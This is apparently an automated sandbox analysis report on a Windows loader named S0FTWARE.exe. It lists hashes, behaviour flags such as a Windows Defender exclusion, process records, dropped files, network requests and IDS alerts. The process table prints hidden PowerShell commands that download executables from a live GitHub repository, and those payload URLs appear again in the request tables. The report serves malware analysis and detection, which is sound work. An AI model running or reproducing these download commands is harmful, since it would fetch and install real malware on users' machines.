| File name: | S0FTWARE.exe |
| Full analysis: | https://app.any.run/tasks/55248e4c-0ebf-4344-ad43-abe28d9c3d30 |
| Verdict: | Malicious activity |
| Threats: | A loader is malicious software that infiltrates devices to deliver malicious payloads. This malware is capable of infecting victims’ computers, analyzing their system information, and installing other types of threats, such as trojans or stealers. Criminals usually deliver loaders through phishing emails and links by relying on social engineering to trick users into downloading and running their executables. Loaders employ advanced evasion and persistence tactics to avoid detection. |
| Analysis date: | April 29, 2025, 13:25:15 |
| OS: | Windows 10 Professional (build: 19044, 64 bit) |
| Tags: | |
| Indicators: | |
| MIME: | application/vnd.microsoft.portable-executable |
| File info: | PE32+ executable (console) x86-64, for MS Windows, 6 sections |
| MD5: | D7290BE8E7E1D513045F79C145C90B05 |
| SHA1: | 301961BA2B2C327B77145A8881C35A0C12E3067B |
| SHA256: | B1352AD10F24C0610E89B531EBEADD04F4A53310F98EF50CD94A480DCEC2EC6E |
| SSDEEP: | 12288:mK7R7mSDELjsl50PgkEKyOKbtfyHDBgS9A8W1XcddvNHke/2bMmuGVORtWIDk:nR7mSDELjsl+PekVgSvdvdke/2bMmuGE |
MALICIOUS
Adds path to the Windows Defender exclusion list
- S0FTWARE.exe (PID: 7964)
Run PowerShell with an invisible window
- powershell.exe (PID: 6344)
- powershell.exe (PID: 8132)
- powershell.exe (PID: 6512)
- powershell.exe (PID: 1040)
Changes Windows Defender settings
- S0FTWARE.exe (PID: 7964)
GENERIC has been found (auto)
- powershell.exe (PID: 6344)
SUSPICIOUS
Reads security settings of Internet Explorer
- S0FTWARE.exe (PID: 7700)
- S0FTWARE.exe (PID: 7964)
Reads the date of Windows installation
- S0FTWARE.exe (PID: 7700)
- S0FTWARE.exe (PID: 7964)
Application launched itself
- S0FTWARE.exe (PID: 7700)
Starts POWERSHELL.EXE for commands execution
- S0FTWARE.exe (PID: 7964)
Script adds exclusion path to Windows Defender
- S0FTWARE.exe (PID: 7964)
Downloads file from URI via Powershell
- powershell.exe (PID: 6344)
- powershell.exe (PID: 6512)
- powershell.exe (PID: 1040)
Executable content was dropped or overwritten
- powershell.exe (PID: 6512)
- powershell.exe (PID: 1040)
- powershell.exe (PID: 6344)
INFO
Checks supported languages
- S0FTWARE.exe (PID: 7700)
- S0FTWARE.exe (PID: 7964)
Reads the computer name
- S0FTWARE.exe (PID: 7700)
- S0FTWARE.exe (PID: 7964)
Process checks computer location settings
- S0FTWARE.exe (PID: 7700)
- S0FTWARE.exe (PID: 7964)
Disables trace logs
- powershell.exe (PID: 6344)
- powershell.exe (PID: 1040)
- powershell.exe (PID: 6512)
Checks proxy server information
- powershell.exe (PID: 6344)
- powershell.exe (PID: 1040)
- powershell.exe (PID: 6512)
- slui.exe (PID: 6156)
Checks if a key exists in the options dictionary (POWERSHELL)
- powershell.exe (PID: 8132)
Script raised an exception (POWERSHELL)
- powershell.exe (PID: 8132)
The sample compiled with english language support
- powershell.exe (PID: 6344)
Reads the software policy settings
- slui.exe (PID: 6156)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
TRiD
| .exe | | | Win64 Executable (generic) (87.3) |
|---|---|---|
| .exe | | | Generic Win/DOS Executable (6.3) |
| .exe | | | DOS Executable Generic (6.3) |
EXIF
EXE
| MachineType: | AMD AMD64 |
|---|---|
| TimeStamp: | 2025:04:29 11:24:12+00:00 |
| ImageFileCharacteristics: | Executable, Large address aware |
| PEType: | PE32+ |
| LinkerVersion: | 14.42 |
| CodeSize: | 233472 |
| InitializedDataSize: | 115200 |
| UninitializedDataSize: | - |
| EntryPoint: | 0x16aa0 |
| OSVersion: | 6 |
| ImageVersion: | - |
| SubsystemVersion: | 6 |
| Subsystem: | Windows command line |
Total processes
136
Monitored processes
13
Malicious processes
3
Suspicious processes
2
Behavior graph
Click at the process to see the details
Process information
PID | CMD | Path | Indicators | Parent process | |||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| 744 | \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1 | C:\Windows\System32\conhost.exe | — | powershell.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: HIGH Description: Console Window Host Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 1040 | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -Command "Invoke-WebRequest -Uri 'https://github.com/grosesch/ibra/raw/refs/heads/main/sec.exe' -OutFile 'C:\Users\admin\AppData\Local\cvkbyazcx\qprivd_2.exe'" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | S0FTWARE.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: HIGH Description: Windows PowerShell Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 2772 | \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1 | C:\Windows\System32\conhost.exe | — | powershell.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: HIGH Description: Console Window Host Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 5756 | \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1 | C:\Windows\System32\conhost.exe | — | powershell.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: HIGH Description: Console Window Host Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 6156 | C:\WINDOWS\System32\slui.exe -Embedding | C:\Windows\System32\slui.exe | svchost.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Activation Client Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 6344 | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -Command "Invoke-WebRequest -Uri 'https://github.com/grosesch/ibra/raw/refs/heads/main/thi.exe' -OutFile 'C:\Users\admin\AppData\Local\cvkbyazcx\ctivzn_3.exe'" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | S0FTWARE.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: HIGH Description: Windows PowerShell Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 6512 | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -Command "Invoke-WebRequest -Uri 'https://github.com/grosesch/ibra/raw/refs/heads/main/fir.exe' -OutFile 'C:\Users\admin\AppData\Local\cvkbyazcx\pzmpnt_1.exe'" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | S0FTWARE.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: HIGH Description: Windows PowerShell Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 7700 | "C:\Users\admin\Desktop\S0FTWARE.exe" | C:\Users\admin\Desktop\S0FTWARE.exe | — | explorer.exe | |||||||||||
User: admin Integrity Level: MEDIUM Exit code: 0 Modules
| |||||||||||||||
| 7708 | \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1 | C:\Windows\System32\conhost.exe | — | S0FTWARE.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Console Window Host Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 7964 | "C:\Users\admin\Desktop\S0FTWARE.exe" | C:\Users\admin\Desktop\S0FTWARE.exe | S0FTWARE.exe | ||||||||||||
User: admin Integrity Level: HIGH Exit code: 0 Modules
| |||||||||||||||
Total events
23 869
Read events
23 869
Write events
0
Delete events
0
Modification events
Executable files
3
Suspicious files
1
Text files
8
Unknown types
0
Dropped files
PID | Process | Filename | Type | |
|---|---|---|---|---|
| 1040 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_rhlfqw2z.x3v.ps1 | text | |
MD5:D17FE0A3F47BE24A6453E9EF58C94641 | SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 | |||
| 8132 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_rlkg0epw.e0l.ps1 | text | |
MD5:D17FE0A3F47BE24A6453E9EF58C94641 | SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 | |||
| 6344 | powershell.exe | C:\Users\admin\AppData\Local\cvkbyazcx\ctivzn_3.exe | executable | |
MD5:CB1AB881DF77D5E59C9CD71A042489DD | SHA256:23FA323EEA0A8A6367E810996A54337197C1750A9A0A53C306C8C4022DD94780 | |||
| 6512 | powershell.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | binary | |
MD5:487212E49089A4FBBA8706F36B7FE985 | SHA256:F7190882A096966A53C860420646C41C3FD25A1138902EDE0A3B3BA846B1D701 | |||
| 6512 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_5kn00no1.dfa.ps1 | text | |
MD5:D17FE0A3F47BE24A6453E9EF58C94641 | SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 | |||
| 6512 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_0beaw5mi.fyi.psm1 | text | |
MD5:D17FE0A3F47BE24A6453E9EF58C94641 | SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 | |||
| 6344 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_agpf3nfw.eft.psm1 | text | |
MD5:D17FE0A3F47BE24A6453E9EF58C94641 | SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 | |||
| 6344 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_4rxnmnxv.tly.ps1 | text | |
MD5:D17FE0A3F47BE24A6453E9EF58C94641 | SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 | |||
| 1040 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_l4h3jjwj.j5d.psm1 | text | |
MD5:D17FE0A3F47BE24A6453E9EF58C94641 | SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 | |||
| 1040 | powershell.exe | C:\Users\admin\AppData\Local\cvkbyazcx\qprivd_2.exe | executable | |
MD5:2FF8E057084B5C180E9B447E08D2D747 | SHA256:169154BD365801FC16A02C8C58E50450544E6FF6DB7480D9703D591042729538 | |||
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
10
TCP/UDP connections
25
DNS requests
11
Threats
26
HTTP requests
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
|---|---|---|---|---|---|---|---|---|---|
— | — | GET | 302 | 140.82.121.3:443 | https://github.com/grosesch/ibra/raw/refs/heads/main/thi.exe | unknown | — | — | — |
— | — | GET | 302 | 140.82.121.3:443 | https://github.com/grosesch/ibra/raw/refs/heads/main/sec.exe | unknown | — | — | — |
— | — | GET | 302 | 140.82.121.3:443 | https://github.com/grosesch/ibra/raw/refs/heads/main/fir.exe | unknown | — | — | — |
2920 | svchost.exe | GET | 200 | 72.246.169.155:80 | http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl | unknown | — | — | whitelisted |
2920 | svchost.exe | GET | 200 | 23.216.77.6:80 | http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl | unknown | — | — | whitelisted |
— | — | GET | 200 | 140.82.121.3:443 | https://raw.githubusercontent.com/grosesch/ibra/refs/heads/main/thi.exe | unknown | executable | 5.13 Mb | whitelisted |
— | — | GET | 200 | 140.82.121.3:443 | https://raw.githubusercontent.com/grosesch/ibra/refs/heads/main/sec.exe | unknown | executable | 27.5 Kb | whitelisted |
— | — | GET | 200 | 140.82.121.3:443 | https://raw.githubusercontent.com/grosesch/ibra/refs/heads/main/fir.exe | unknown | executable | 137 Kb | whitelisted |
— | — | POST | 500 | 40.91.76.224:443 | https://activation-v2.sls.microsoft.com/SLActivateProduct/SLActivateProduct.asmx?configextension=Retail | unknown | xml | 512 b | whitelisted |
— | — | POST | 500 | 40.91.76.224:443 | https://activation-v2.sls.microsoft.com/SLActivateProduct/SLActivateProduct.asmx?configextension=Retail | unknown | xml | 512 b | whitelisted |
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
Connections
PID | Process | IP | Domain | ASN | CN | Reputation |
|---|---|---|---|---|---|---|
— | — | 51.104.136.2:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | IE | whitelisted |
— | — | 20.73.194.208:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | NL | whitelisted |
4 | System | 192.168.100.255:138 | — | — | — | whitelisted |
— | — | 40.127.240.158:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | IE | whitelisted |
4 | System | 192.168.100.255:137 | — | — | — | whitelisted |
5496 | MoUsoCoreWorker.exe | 20.73.194.208:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | NL | whitelisted |
5496 | MoUsoCoreWorker.exe | 40.127.240.158:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | IE | whitelisted |
2112 | svchost.exe | 40.127.240.158:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | IE | whitelisted |
6512 | powershell.exe | 140.82.121.3:443 | github.com | GITHUB | US | whitelisted |
1040 | powershell.exe | 140.82.121.3:443 | github.com | GITHUB | US | whitelisted |
DNS requests
Domain | IP | Reputation |
|---|---|---|
settings-win.data.microsoft.com |
| whitelisted |
google.com |
| whitelisted |
github.com |
| whitelisted |
activation-v2.sls.microsoft.com |
| whitelisted |
raw.githubusercontent.com |
| whitelisted |
crl.microsoft.com |
| whitelisted |
www.microsoft.com |
| whitelisted |
Threats
PID | Process | Class | Message |
|---|---|---|---|
— | — | Potentially Bad Traffic | ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile |
— | — | Not Suspicious Traffic | ET INFO Windows Powershell User-Agent Usage |
— | — | Misc activity | ET INFO Request for EXE via Powershell |
— | — | Potentially Bad Traffic | ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile |
— | — | Not Suspicious Traffic | ET INFO Windows Powershell User-Agent Usage |
— | — | Misc activity | ET INFO Request for EXE via Powershell |
2196 | svchost.exe | Not Suspicious Traffic | INFO [ANY.RUN] Attempting to access raw user content on GitHub |
— | — | Potentially Bad Traffic | ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile |
— | — | Not Suspicious Traffic | ET INFO Windows Powershell User-Agent Usage |
— | — | Misc activity | ET INFO Request for EXE via Powershell |